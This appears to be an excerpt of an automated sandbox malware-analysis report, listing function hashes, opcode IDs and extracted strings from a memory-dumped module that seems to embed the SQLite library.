                                                                                                                                                                                      • Instruction Fuzzy Hash: E9A28E22A09A4285EB54DF25E4543B923A5FB84B89F170536CECE577B4DFBCE881C342
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 20c:20e$40f$40f-20a-20d$50f$50f-20a-20d$second
                                                                                                                                                                                      • API String ID: 0-2094803905
                                                                                                                                                                                      • Opcode ID: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                      • Instruction ID: 90f64418401a1c19b0679f36c7a2a2d0ea8523b985cd5cad39c77c9ae3b44622
                                                                                                                                                                                      • Opcode Fuzzy Hash: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                      • Instruction Fuzzy Hash: CE52CD62F2868246E729CF38A4107787795AF95744F178333DA8EB66A4EF7CE4C18701
                                                                                                                                                                                      Strings
Similarity
• API ID:
• String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
• API String ID: 0-968123305
Similarity
• API ID:
• String ID: main$schema$sqlite_$sqlite_master$sqlite_temp_master$temp_schema
• API String ID: 0-3006123741
Similarity
• API ID:
• String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
• API String ID: 0-3582982771
Similarity
• API ID:
• String ID: %d %d %d %d $fts3cursor$illegal first argument to %s$offsets$p
• API String ID: 0-1954512986
Similarity
• API ID:
• String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$block$misuse
• API String ID: 0-2158970013
Similarity
• API ID:
• String ID: %s.%s$%s.rowid$5
• API String ID: 0-2959728198
Similarity
• API ID:
• String ID: %.4c%s%.16c$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
• API String ID: 0-4294478755
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
• Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: BBB$f$sqlite\_%
                                                                                                                                                                                      • API String ID: 0-4099593418
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                      • API String ID: 0-2903559916
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: LAST TERM OF $USE TEMP B-TREE FOR %sORDER BY$USE TEMP B-TREE FOR LAST %d TERMS OF ORDER BY
                                                                                                                                                                                      • API String ID: 0-13984226
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 5$7$row value misused
                                                                                                                                                                                      • API String ID: 0-355943616
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                      • API String ID: 0-4001610065
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                      • API String ID: 0-4001610065
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                      • API String ID: 0-4001610065
                                                                                                                                                                                      • Opcode ID: e9ba09a2d25743db847674225f457755739cea2aeed368362171beb30f9384af
                                                                                                                                                                                      • Instruction ID: fe8bc8c9f2a4707fa05ead8e110f6a854f265524b4408ddc98a2aacc29c9a64a
                                                                                                                                                                                      • Opcode Fuzzy Hash: e9ba09a2d25743db847674225f457755739cea2aeed368362171beb30f9384af
                                                                                                                                                                                      • Instruction Fuzzy Hash: B461C762B0879142EB648F26E54033927A1FB8DB80F174136DE8E57770CFB9E8D29741
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: DELETE FROM '%q'.'%q_data' WHERE id>=? AND id<=?$DELETE FROM '%q'.'%q_idx' WHERE segid=?
                                                                                                                                                                                      • API String ID: 0-1811289845
                                                                                                                                                                                      • Opcode ID: b6b146aee013950ab8ef86aca144395e8f47c6aa3924b7aa79dc6219dd926258
                                                                                                                                                                                      • Instruction ID: a158794696866f2c6561223cf1f3aa5c1961559d37ccf5bb5a10a2f00802e396
                                                                                                                                                                                      • Opcode Fuzzy Hash: b6b146aee013950ab8ef86aca144395e8f47c6aa3924b7aa79dc6219dd926258
                                                                                                                                                                                      • Instruction Fuzzy Hash: 08C29EB2A0878286EB54CF25E4443BD77A1FB45B88F138136DA8D477A4DFB8E591C702
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                      • Opcode ID: e79b72e8b79be243d44fe629eb2a3a90386f5c847bdc0db6c38668ba5c18dd31
                                                                                                                                                                                      • Instruction ID: 5693c64d4bfae4508cf4b686630a497b5acf5328d1c3058703fa331eb6f21dd1
                                                                                                                                                                                      • Opcode Fuzzy Hash: e79b72e8b79be243d44fe629eb2a3a90386f5c847bdc0db6c38668ba5c18dd31
                                                                                                                                                                                      • Instruction Fuzzy Hash: 98323636A08A4386EF54CF26E44036E73A1FB88B88F174131DE8E57764DFB8E8458B41
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: @$rows deleted
                                                                                                                                                                                      • API String ID: 0-3120709674
                                                                                                                                                                                      • Opcode ID: 1760b45886ef156f09229601bb7b9ed7295d86ea181ee365c454bfb11108a558
                                                                                                                                                                                      • Instruction ID: e8c106b9a976f68192a6ace33b4c6a94d4ac7e80f9069018ec605d8225107683
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1760b45886ef156f09229601bb7b9ed7295d86ea181ee365c454bfb11108a558
                                                                                                                                                                                      • Instruction Fuzzy Hash: C682617260879186EB64DF25B0417AA77A1FB88B84F064136DBCD47BA5DFBCE481CB01
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: G$fts5 expression tree is too large (maximum depth %d)
                                                                                                                                                                                      • API String ID: 0-1043253150
                                                                                                                                                                                      • Opcode ID: 1dacaa6d403f56b6151e330b83b0a2136c88c759f46f1e11ad4bfe2d02e929b9
                                                                                                                                                                                      • Instruction ID: 15e29e16773b7fb956cc5f6722b720f5f065d33c154b30d405650573be8270a6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dacaa6d403f56b6151e330b83b0a2136c88c759f46f1e11ad4bfe2d02e929b9
                                                                                                                                                                                      • Instruction Fuzzy Hash: A0026972A09A5286EB558F16F5547B933A1FF88B84F074136DA8D076B8DFBCE481C302
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                      • API String ID: 0-3175670447
                                                                                                                                                                                      • Opcode ID: 63699c3f95372a92f3a2b3fdc19fab25a4b70f5c70196a9996f526a0550bd2b3
                                                                                                                                                                                      • Instruction ID: deaea2ee2afd5fc476be92368efd0fa6b9f77883a3582ab94121466cde35124e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 63699c3f95372a92f3a2b3fdc19fab25a4b70f5c70196a9996f526a0550bd2b3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CF1A332A0878686D7689F25E44076E77A1FBC8B88F135135DA8D87BA8DF78E444CB41
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -- TRIGGER %s$out of memory
                                                                                                                                                                                      • API String ID: 0-3478380517
                                                                                                                                                                                      • Opcode ID: 23aabf06f57b6786606c5325c3a9138d2184255b20b78c424074b3fddfd34c14
                                                                                                                                                                                      • Instruction ID: 336fd8c1712a189949f50f4517658c912890e81fe486a66ea8f3702f37e3fd50
                                                                                                                                                                                      • Opcode Fuzzy Hash: 23aabf06f57b6786606c5325c3a9138d2184255b20b78c424074b3fddfd34c14
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF18F72A09B8186EB60CF65E8803BD77A0FB88B84F564136DACD477A5DF78E091C741
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1, xrefs: 00007FFEEE1808B2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1
                                                                                                                                                                                      • API String ID: 0-3976175944
                                                                                                                                                                                      • Opcode ID: fedb56156b9bc48f73f437f3c5a3ec9536f85fdf285c9aadbcb7d6a8aaf38f46
                                                                                                                                                                                      • Instruction ID: fc74ccb38f942b245b0234994534b580f18b0682318f8c671573abeddfcce618
                                                                                                                                                                                      • Opcode Fuzzy Hash: fedb56156b9bc48f73f437f3c5a3ec9536f85fdf285c9aadbcb7d6a8aaf38f46
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F24822A09B8686FA549F16F94037963A0FF88B84F17457ADACD43774DFBDE4808346
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                      • API String ID: 0-1993550816
                                                                                                                                                                                      • Opcode ID: 800ee10b2637b53d27522779f668809876616853b59c53bd878f5cf2433dc974
                                                                                                                                                                                      • Instruction ID: b07d82ef09215a6f6ade8ac0b7294a82c2619d38e2e544d0b1d076c8ded018dd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 800ee10b2637b53d27522779f668809876616853b59c53bd878f5cf2433dc974
                                                                                                                                                                                      • Instruction Fuzzy Hash: 40829D72618B818ADB60DF25E040BBD7BA1F784F88F568136DB8E47765DB78E580CB01
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                                      • Opcode ID: 5d1d8df20a067cdd600f4e3829427086ed0d9efb72d7c63e22abf0cf9beb3e2a
                                                                                                                                                                                      • Instruction ID: 15e6912efa1ea742ca47ec63662f8636ec906f9e1c715d7c8c3230c406ba27bd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d1d8df20a067cdd600f4e3829427086ed0d9efb72d7c63e22abf0cf9beb3e2a
                                                                                                                                                                                      • Instruction Fuzzy Hash: E832E522A0C68685E6658B25B0403796391BF99BC4F174333DEDE573BADFADE481C302
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s%s
                                                                                                                                                                                      • API String ID: 0-3252725368
                                                                                                                                                                                      • Opcode ID: 3c65fca048a75e6f4caca88d46e104159594357b08502f81daf5da87108ec1da
                                                                                                                                                                                      • Instruction ID: 70b5a223cfbaef5bd6a049c03fac7ecd30f052f49fe260ee6f2e868c76dff0ce
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c65fca048a75e6f4caca88d46e104159594357b08502f81daf5da87108ec1da
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E22AE22E19A5380EB548F25E4507BD23A0BB88B48F174135DECD0B7A9DFBCD541DB62
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: VUUU
                                                                                                                                                                                      • API String ID: 0-2040033107
                                                                                                                                                                                      • Opcode ID: d2c0a59ba29e9a2d7aa5d55e4fb8c484691047d8220697a3e4a254c9517e023e
                                                                                                                                                                                      • Instruction ID: 37e661ed630c320eeaea57fdb1a98125d8202c15f9a842ca5c08c253dff13605
                                                                                                                                                                                      • Opcode Fuzzy Hash: d2c0a59ba29e9a2d7aa5d55e4fb8c484691047d8220697a3e4a254c9517e023e
                                                                                                                                                                                      • Instruction Fuzzy Hash: BD220672A08AC5C6D751CB29E0407ADB7A5FB99784F468327DA8E13761EF78E095CB00
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: sqlite_stat1
                                                                                                                                                                                      • API String ID: 0-692927832
                                                                                                                                                                                      • Opcode ID: a6b4621bc0de304cc45b0485c29ce93352681e1289ebf3067025559b5e19c059
                                                                                                                                                                                      • Instruction ID: a7d335d1ae0dc4a5b65b69a5d6966191d6c95121920a02bcc76be6178b0abedb
                                                                                                                                                                                      • Opcode Fuzzy Hash: a6b4621bc0de304cc45b0485c29ce93352681e1289ebf3067025559b5e19c059
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0912E172A0869186EB70DF15A444BBA7BA1FB84B94F474137EACD43BB5EF78D4808701
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: RtreeMatchArg
                                                                                                                                                                                      • API String ID: 0-1459067757
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: fts5 expression tree is too large (maximum depth %d)
                                                                                                                                                                                      • API String ID: 0-1363701629
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: corrupt database
                                                                                                                                                                                      • API String ID: 0-2831454312
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -- %s
                                                                                                                                                                                      • API String ID: 0-3029982666
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 3f73ab410a2f62c1f0993845578433e59d469de38c974278e845bfb031a1a337
                                                                                                                                                                                      • Instruction ID: 6abaa75be74a9c34295b5f07a83c23d18378920e697397ec22a800ad89e3a097
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f73ab410a2f62c1f0993845578433e59d469de38c974278e845bfb031a1a337
                                                                                                                                                                                      • Instruction Fuzzy Hash: 97621325A0AB4686FA599F12F94477873A0FF99F90F175636D98E03270CFBDE4848342
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 712db770b48cd591b5b6e1b9a2a79dc4bcb6b46070a1e6913c971b8dbb82dbb6
                                                                                                                                                                                      • Instruction ID: 4887f2e3c4a316d1df34b94a31ab910d0d68f00f3b14f99b1ee4c0dc97b7d6ee
                                                                                                                                                                                      • Opcode Fuzzy Hash: 712db770b48cd591b5b6e1b9a2a79dc4bcb6b46070a1e6913c971b8dbb82dbb6
                                                                                                                                                                                      • Instruction Fuzzy Hash: EF22A262A0878286EB248B25F94477D77A4FB4DB84F074132CB8D47BA1EF7CE8919741
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cc1b007a0e7f494ccc1aa2125b520b681e1dd36fce971226ecee65daf158528a
                                                                                                                                                                                      • Instruction ID: fb2685e29930aa9ef9cfa5aabe1e3fd88efd9d82b4035d2e06c74e10d044386c
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1b007a0e7f494ccc1aa2125b520b681e1dd36fce971226ecee65daf158528a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 86328432A0878686EB54DF56E89077A37A0FB88B40F134036CA8D43761DFB9E895D742
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 683f50ff00500083cb96f2e4641a2aa8dd998adb94af6ba38799abcec38fda64
                                                                                                                                                                                      • Instruction ID: 7b543edebf6ca901dfde30f5a240d0c1701594e34c7b1d675d080129734cda97
                                                                                                                                                                                      • Opcode Fuzzy Hash: 683f50ff00500083cb96f2e4641a2aa8dd998adb94af6ba38799abcec38fda64
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B325D32A08B8686DB64CF15E44476A77A5FB84B85F074136CACE47B64EFBCE485C701
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cfb9e95e3d11ab3621276523affb0fbc1a77b12864efbee8878d1e38b6e6d3a3
                                                                                                                                                                                      • Instruction ID: 9f1b7e09ea9f089adf181904d0ed2b4ced8648946c1f2ae93d5ecf17928554f7
                                                                                                                                                                                      • Opcode Fuzzy Hash: cfb9e95e3d11ab3621276523affb0fbc1a77b12864efbee8878d1e38b6e6d3a3
                                                                                                                                                                                      • Instruction Fuzzy Hash: B2321725E0DB4682EA599F56F54037823A0BF98B86F175636DACE03370DFBDE4908342
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d286035da097dde22393a0f84129f7983b518bc6ee84b25c1789d8efd426f89d
                                                                                                                                                                                      • Instruction ID: 3a597a31519b1ef65c86c529c182bd647b2787ddeaa7d947ae6754b52a23f602
                                                                                                                                                                                      • Opcode Fuzzy Hash: d286035da097dde22393a0f84129f7983b518bc6ee84b25c1789d8efd426f89d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2202C172A093868BE720CF25E54037937A1FB58B89F074136DB8D83762EB7CE5A18701
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5527062ba7d52b5c27d767ab160ff379fbd96a8c04b61f753a022f43e0f2db35
                                                                                                                                                                                      • Instruction ID: 68972d810d5a44a5bd116b0806a04d9bb9458fd03893d27c709184beab0baa87
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5527062ba7d52b5c27d767ab160ff379fbd96a8c04b61f753a022f43e0f2db35
                                                                                                                                                                                      • Instruction Fuzzy Hash: E7222421A09B4286EB549F26F94037973A4FF89B84F174636CA8E43770DFBDE4848746
                                                                                                                                                                                      • Instruction Fuzzy Hash: FBC1B032A0868286E7648E11B4403BE67A0FB85B94F1B0176DECD477A5DFBCE8C5C785
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 32f1f2828b4eefa217af84348aacfedab192c67278cefb9885bace13deee6320
                                                                                                                                                                                      • Instruction ID: 2d4836e16e9de0438cc1a4fa2d09df712f447dbc6222701fe2e220f0a05ac117
                                                                                                                                                                                      • Opcode Fuzzy Hash: 32f1f2828b4eefa217af84348aacfedab192c67278cefb9885bace13deee6320
                                                                                                                                                                                      • Instruction Fuzzy Hash: E9C1D072A08B9682EB648F16F44477D73A4FB84B90F034036CA9D47764DFBDE8898702
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
